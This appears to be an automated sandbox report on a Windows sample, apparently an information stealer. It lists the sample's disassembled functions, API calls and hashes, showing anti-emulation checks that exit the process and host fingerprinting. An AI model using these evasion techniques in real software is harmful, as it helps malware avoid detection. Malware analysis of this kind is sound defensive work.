                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C011B
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C013F
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C015A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0189
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C0194
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C01C3
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C01CE
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0206
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000C0250
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C0288
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C059B
                                    • lstrlen.KERNEL32(00E565A0), ref: 000C05AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C05D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C05E3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C060E
                                    • lstrlen.KERNEL32(00E6D9A8), ref: 000C0625
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C064C
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C0658
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C0681
                                    • lstrlen.KERNEL32(00E564A0), ref: 000C0698
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C06C9
                                    • lstrcat.KERNEL32(00000000,?), ref: 000C06D5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C0706
                                    • lstrcpy.KERNEL32(00000000,00E68B80), ref: 000C074B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C077F
                                    • lstrcpy.KERNEL32(00000000,00E6DA38), ref: 000C07E7
                                    • lstrcpy.KERNEL32(00000000,00E687F0), ref: 000C0858
                                    • lstrcpy.KERNEL32(00000000,fplugins), ref: 000C08CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C0928
                                    • lstrcpy.KERNEL32(00000000,00E68980), ref: 000C09F8
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A2528
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A254E
                                      • Part of subcall function 000A24E0: lstrcpy.KERNEL32(00000000,?), ref: 000A2577
                                    • lstrcpy.KERNEL32(00000000,00E68800), ref: 000C0ACE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C0B81
                                    • lstrcpy.KERNEL32(00000000,00E68800), ref: 000C0D58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID: fplugins
                                    • API String ID: 2500673778-38756186
                                    • Opcode ID: 11bedbd5edf190439f37e900648c90a79d332cd15363a335ba61169b2ddc4ac6
                                    • Instruction ID: 7d4a3f459399f37545a7bbefe44074baed5a21428afd1be0eb23b83b90f21a19
                                    • Opcode Fuzzy Hash: 11bedbd5edf190439f37e900648c90a79d332cd15363a335ba61169b2ddc4ac6
                                    • Instruction Fuzzy Hash: B5E23B70A05341CFD764DF69C488BAEB7E1BF89314F58856EE48D8B262DB31D846CB42
                                    Function 000BF2F8 Relevance: 31.9, APIs: 16, Strings: 2, Instructions: 391stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00E56520), ref: 000BF315
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF3A3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF3C7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF47B
                                    • lstrcpy.KERNEL32(00000000,00E56520), ref: 000BF4BB
                                    • lstrcpy.KERNEL32(00000000,00E68B20), ref: 000BF4EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF59E
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000BF61C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF64C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF69A
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BF718
                                    • lstrlen.KERNEL32(00E68B10), ref: 000BF746
                                    • lstrcpy.KERNEL32(00000000,00E68B10), ref: 000BF771
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BF793
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BF7E4
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BFA32
                                    • lstrlen.KERNEL32(00E68B00), ref: 000BFA60
                                    • lstrcpy.KERNEL32(00000000,00E68B00), ref: 000BFA8B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BFAAD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BFAFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: e$ERROR
                                    • API String ID: 367037083-2176359330
                                    • Opcode ID: d190afee095b896517270182ca7586e60dbf5fc6885a329739068cf369c64b67
                                    • Instruction ID: c8eb854cc731e777a7f9043ac8ae29215fbba10e708a72829d62445a7e3a2adb
                                    • Opcode Fuzzy Hash: d190afee095b896517270182ca7586e60dbf5fc6885a329739068cf369c64b67
                                    • Instruction Fuzzy Hash: D8F12070A02202CFDB64DF69DD48AAAB7F5BF44714B1981BEE4099B362DB31DC42CB51
                                    Function 000B8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2721 b8ca0-b8cc4 StrCmpCA 2722 b8ccd-b8ce6 2721->2722 2723 b8cc6-b8cc7 ExitProcess 2721->2723 2725 b8cec-b8cf1 2722->2725 2726 b8ee2-b8eef call a2a20 2722->2726 2728 b8cf6-b8cf9 2725->2728 2729 b8cff 2728->2729 2730 b8ec3-b8edc 2728->2730 2732 b8e88-b8e9a lstrlen 2729->2732 2733 b8e6f-b8e7d StrCmpCA 2729->2733 2734 b8d06-b8d15 lstrlen 2729->2734 2735 b8d84-b8d92 StrCmpCA 2729->2735 2736 b8da4-b8db8 StrCmpCA 2729->2736 2737 b8d5a-b8d69 lstrlen 2729->2737 2738 b8dbd-b8dcb StrCmpCA 2729->2738 2739 b8ddd-b8deb StrCmpCA 2729->2739 2740 b8dfd-b8e0b StrCmpCA 2729->2740 2741 b8e1d-b8e2b StrCmpCA 2729->2741 2742 b8e3d-b8e4b StrCmpCA 2729->2742 2743 b8d30-b8d3f lstrlen 2729->2743 2744 b8e56-b8e64 StrCmpCA 2729->2744 2730->2726 2770 b8cf3 2730->2770 2751 b8e9c-b8ea1 call a2a20 2732->2751 2752 b8ea4-b8eb0 call a2930 2732->2752 2733->2730 2750 b8e7f-b8e86 2733->2750 2746 b8d1f-b8d2b call a2930 2734->2746 2747 b8d17-b8d1c call a2a20 2734->2747 2735->2730 2758 b8d98-b8d9f 2735->2758 2736->2730 2755 b8d6b-b8d70 call a2a20 2737->2755 2756 b8d73-b8d7f call a2930 2737->2756 2738->2730 2759 b8dd1-b8dd8 2738->2759 2739->2730 2760 b8df1-b8df8 2739->2760 2740->2730 2761 b8e11-b8e18 2740->2761 2741->2730 2745 b8e31-b8e38 2741->2745 2742->2730 2748 b8e4d-b8e54 2742->2748 2753 b8d49-b8d55 call a2930 2743->2753 2754 b8d41-b8d46 call a2a20 2743->2754 2744->2730 2749 b8e66-b8e6d 2744->2749 2745->2730 2779 b8eb3-b8eb5 2746->2779 2747->2746 2748->2730 2749->2730 2750->2730 2751->2752 2752->2779 2753->2779 2754->2753 2755->2756 2756->2779 2758->2730 2759->2730 2760->2730 2761->2730 2770->2728 2779->2730 2780 b8eb7-b8eb9 2779->2780 2780->2730 2781 b8ebb-b8ebd lstrcpy 2780->2781 2781->2730
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 7db02636117a6538c5b10a7628a5b93f63599cc75c95398b112386bc0b2d97b3
                                    • Instruction ID: 9cafa273ab76a6b5bd0fa16b5ba2b1d42c5675214fb118fc0d83b46dc381bfd2
                                    • Opcode Fuzzy Hash: 7db02636117a6538c5b10a7628a5b93f63599cc75c95398b112386bc0b2d97b3
                                    • Instruction Fuzzy Hash: EE515C70A09701EFC760AFA5EC88AAF7BF8EB54701B10882EF552D6621DB74D945CF21
                                    Function 000C2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2782 c2740-c2783 GetWindowsDirectoryA 2783 c278c-c27ea GetVolumeInformationA 2782->2783 2784 c2785 2782->2784 2785 c27ec-c27f2 2783->2785 2784->2783 2786 c2809-c2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 c27f4-c2807 2785->2787 2788 c2826-c2844 wsprintfA 2786->2788 2789 c2822-c2824 2786->2789 2787->2785 2790 c285b-c2872 call c71e0 2788->2790 2789->2790
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 000C277B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000B93B6,00000000,00000000,00000000,00000000), ref: 000C27AC
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000C280F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2816
                                    • wsprintfA.USER32 ref: 000C283B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 31d2e598ed40c286979e84ef64f7a2ac2d77c2502d943aaeb96244052a1dfb1d
                                    • Instruction ID: 291526794eff217a9cae2dffa8d3ffcabeabc7335d2305b6c529d69976018deb
                                    • Opcode Fuzzy Hash: 31d2e598ed40c286979e84ef64f7a2ac2d77c2502d943aaeb96244052a1dfb1d
                                    • Instruction Fuzzy Hash: 383150B1D092099FCB14DFB89989AEFBFBCEF58710F10416EE505F7650E6349A408BA1
                                    Function 000A4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2793 a4bc0-a4bce 2794 a4bd0-a4bd5 2793->2794 2794->2794 2795 a4bd7-a4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call a2a20 2794->2795
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 000A4BF7
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 000A4C01
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 000A4C0B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 000A4C1F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 000A4C27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: 9570d2f9cb1680c2ae8500b29a0dba9db724e1c54dc7d97617be7bd76e51c600
                                    • Instruction ID: ec430ea40eea22a08b13f18673f908fea404674a2b4bd0698bb2bf5ad67c4182
                                    • Opcode Fuzzy Hash: 9570d2f9cb1680c2ae8500b29a0dba9db724e1c54dc7d97617be7bd76e51c600
                                    • Instruction Fuzzy Hash: 07012D71D01218AFDB10DFA8EC49B9EBBB8EB59320F004126F954E7390EB7499048FD4
                                    Function 000A1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2798 a1030-a1055 GetCurrentProcess VirtualAllocExNuma 2799 a105e-a107b VirtualAlloc 2798->2799 2800 a1057-a1058 ExitProcess 2798->2800 2801 a107d-a1080 2799->2801 2802 a1082-a1088 2799->2802 2801->2802 2803 a108a-a10ab VirtualFree 2802->2803 2804 a10b1-a10b6 2802->2804 2803->2804
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                    • ExitProcess.KERNEL32 ref: 000A1058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000A106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 000A10AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: 1b6a37d9e624b11fc88c5ef00f5f727768cfe7a88ac432c581151ac1bf509b83
                                    • Instruction ID: c502eaeb401a51798182cf39746fc1e1f0a9a078cd5b643c974785db18427d75
                                    • Opcode Fuzzy Hash: 1b6a37d9e624b11fc88c5ef00f5f727768cfe7a88ac432c581151ac1bf509b83
                                    • Instruction Fuzzy Hash: 6401D171B412047BE7605AA57C1EFAA77EDA795B12F208015F708E72C0D9B1ED008A64
                                    Function 000BEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2805 bee90-beeb5 call a2930 2808 beec9-beecd call a6c40 2805->2808 2809 beeb7-beebf 2805->2809 2812 beed2-beee8 StrCmpCA 2808->2812 2809->2808 2810 beec1-beec3 lstrcpy 2809->2810 2810->2808 2813 beeea-bef02 call a2a20 call a2930 2812->2813 2814 bef11-bef18 call a2a20 2812->2814 2823 bef45-befa0 call a2a20 * 10 2813->2823 2824 bef04-bef0c 2813->2824 2819 bef20-bef28 2814->2819 2819->2819 2822 bef2a-bef37 call a2930 2819->2822 2822->2823 2830 bef39 2822->2830 2824->2823 2826 bef0e-bef0f 2824->2826 2829 bef3e-bef3f lstrcpy 2826->2829 2829->2823 2830->2829
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEEC3
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BEEDE
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BEF3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: 62f0b419e00d630df3816bf4cac1e5eae9ab96174b29908903a107f008509048
                                    • Instruction ID: 0295fa9d9ab778e27c93b6fb2538cfaaa267de78f24bef4f77e7467f622a00f6
                                    • Opcode Fuzzy Hash: 62f0b419e00d630df3816bf4cac1e5eae9ab96174b29908903a107f008509048
                                    • Instruction Fuzzy Hash: 2921FF307202469BCB61FFBCD846AEA37E4AF21300F045438B84ADB653EA30DC408B91
                                    Function 000A10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2886 a10c0-a10cb 2887 a10d0-a10dc 2886->2887 2889 a10de-a10f3 GlobalMemoryStatusEx 2887->2889 2890 a1112-a1114 ExitProcess 2889->2890 2891 a10f5-a1106 2889->2891 2892 a111a-a111d 2891->2892 2893 a1108 2891->2893 2893->2890 2894 a110a-a1110 2893->2894 2894->2890 2894->2892
                                    APIs
                                    Strings
                                    Memory Dump Source
